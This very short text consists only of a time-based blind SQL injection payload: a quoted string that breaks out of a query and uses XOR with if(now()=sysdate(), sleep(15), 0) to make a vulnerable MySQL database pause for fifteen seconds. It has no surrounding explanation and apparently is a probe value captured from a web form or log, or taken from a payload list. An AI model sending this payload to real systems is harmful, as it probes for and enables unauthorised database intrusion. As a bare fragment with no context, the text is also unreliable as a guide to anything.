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0"XOR(if(now()=sysdate(),sleep(15),0))XOR"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